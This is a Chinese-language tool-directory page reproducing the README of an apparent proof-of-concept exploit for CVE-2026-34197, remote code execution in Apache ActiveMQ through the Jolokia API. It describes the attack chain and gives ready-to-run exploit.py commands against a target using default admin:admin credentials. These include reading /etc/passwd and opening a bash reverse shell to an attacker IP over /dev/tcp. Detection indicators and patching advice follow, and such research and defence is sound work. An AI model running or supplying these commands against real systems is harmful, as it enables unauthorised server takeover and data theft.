Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-34197 — CVE-2026-34197 的概念验证漏洞利用程序,通过 Jolokia API 在 Apache ActiveMQ 中实现远程代码执行(RCE)。包含 Python 漏洞利用脚本、载荷模板以及用于测试和研究的 Docker 实验环境。 | Kitploit
工具/GitHubGitHub/devsecurityspro/cve-2026-34197
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队实验室与实践
GitHubdevsecurityspro/cve-2026-34197

CVE-2026-34197

CVE-2026-34197 的概念验证漏洞利用程序,通过 Jolokia API 在 Apache ActiveMQ 中实现远程代码执行(RCE)。包含 Python 漏洞利用脚本、载荷模板以及用于测试和研究的 Docker 实验环境。

查看仓库
44个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-34197 — Apache ActiveMQ RCE 通过 Jolokia API

描述

CVE-2026-34197 是 Apache ActiveMQ Classic 中的一个远程代码执行(RCE)漏洞,允许攻击者通过 Web 控制台中暴露的 Jolokia API 在服务器操作系统上执行任意命令。

该漏洞已存在超过 13 年,源于多个组件之间的交互:Jolokia(HTTP-JMX 桥接)、ActiveMQ 的 MBeans、网络连接器和 VM 传输。

漏洞信息

字段详情
CVE IDCVE-2026-34197
类型RCE(远程代码执行)
CWECWE-20(输入验证不当)、CWE-94(代码注入)
受影响版本ActiveMQ Classic < 5.19.4、6.0.0 — 6.2.2
已修补版本5.19.4、6.2.3
需要认证是(默认凭据 admin:admin 常见)
无需认证的版本6.0.0 — 6.1.1(由于 CVE-2024-32114)
默认端口8161(Web 控制台)

利用机制

攻击链如下:

  1. 攻击者向 /api/jolokia/ 发送 POST 请求,调用 broker 的 MBean 上的 addNetworkConnector 操作。
  2. 参数包含一个使用 vm:// 传输的 URI,引用一个不存在的 broker。
  3. ActiveMQ 尝试即时创建该 broker,并接受指向远程 URL 的 brokerConfig 参数。
  4. xbean: 方案表示该资源是一个 Spring XML 配置文件。
  5. Spring 实例化 XML 中定义的所有 bean,包括一个执行 Runtime.getRuntime().exec() 的 bean。
  6. 在服务器上执行任意命令。
root@kitploit:~
攻击者                          ActiveMQ(受害者)
   |                                    |
   |-- POST /api/jolokia/ ------------>|
   |   addNetworkConnector(            |
   |     vm://rce?brokerConfig=        |
   |     xbean:http://攻击者/x.xml)     |
   |                                    |
   |                                    |-- 创建 VM broker
   |                                    |-- 下载 x.xml
   |<-- GET /x.xml --------------------|
   |-- 响应 XML payload --------------->|
   |                                    |-- Spring 实例化 beans
   |                                    |-- Runtime.exec(命令)
   |                                    |

项目结构

root@kitploit:~
CVE-2026-34197/
├── README.md              # 本文件
├── exploit.py             # 主要 PoC
├── payloads/
│   └── template.xml       # Spring XML payload 模板
├── docker/
│   └── docker-compose.yml # 易受攻击的实验室环境
└── LICENSE

要求

  • Python 3.8+
  • 模块:requests、http.server、argparse(标准库)
  • 可访问目标 8161 端口的网络
  • Docker 和 Docker Compose(可选,用于实验室)
root@kitploit:~
pip install requests

使用方法

1. 启动易受攻击的环境(可选)

root@kitploit:~
cd docker
docker-compose up -d

这将在 localhost:8161 启动一个易受攻击的 ActiveMQ Classic 5.18.6。

2. 运行 exploit

root@kitploit:~
# 使用默认凭据的基本用法
python exploit.py -t http://目标:8161 -l 攻击者_IP -c "id"

# 指定凭据
python exploit.py -t http://目标:8161 -l 攻击者_IP -c "whoami" -u admin -p admin

# 指定 payload HTTP 服务器端口
python exploit.py -t http://目标:8161 -l 攻击者_IP -lp 9999 -c "cat /etc/passwd"

# 无认证模式(ActiveMQ 6.0.0 - 6.1.1)
python exploit.py -t http://目标:8161 -l 攻击者_IP -c "id" --no-auth

# 反向 Shell
python exploit.py -t http://目标:8161 -l 攻击者_IP -c "bash -i >& /dev/tcp/攻击者_IP/4444 0>&1"

参数

参数描述
-t, --target目标的基础 URL(例如:http://10.0.0.1:8161)
-l, --lhost用于提供 XML payload 的攻击者 IP
-lp, --lport本地 HTTP 服务器端口(默认:8888)
-c, --command在目标上执行的命令
-u, --user用户名(默认:admin)
-p, --password密码(默认:admin)
--no-auth不发送凭据(适用于 6.0.0 - 6.1.1 版本)
--broker-namebroker 名称(默认:localhost)

检测

ActiveMQ broker 日志中的指标:

root@kitploit:~
INFO  | Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml
WARN  | Could not connect to remote URI: vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml

其他指标:

  • 对 /api/jolokia/ 的 POST 请求,请求体包含 addNetworkConnector
  • ActiveMQ 进程向意外主机发起的出站 HTTP 连接
  • ActiveMQ 的 Java 进程生成意外子进程

修复措施

  • 升级到 ActiveMQ Classic 5.19.4 或 6.2.3
  • 更改 Web 控制台的默认凭据
  • 限制对 8161 端口的网络访问
  • 监控 broker 日志中带有 brokerConfig=xbean:http 的 vm:// URI

参考

  • NVD — CVE-2026-34197
  • Horizon3 — 技术分析
  • Apache ActiveMQ — 安全公告
  • CVE-2024-32114 — Jolokia 无认证
  • CVE-2023-46604 — OpenWire RCE(CISA KEV)

作者

由 KONDOR DEV SECURITY 创建

Telegram

法律声明

本 PoC 仅供安全教育和研究目的使用。在未经明确授权的系统上使用此工具是违法的。作者不对该工具的滥用承担任何责任。

许可证

MIT — 版权所有 (c) 2026 KONDOR DEV SECURITY

下载工具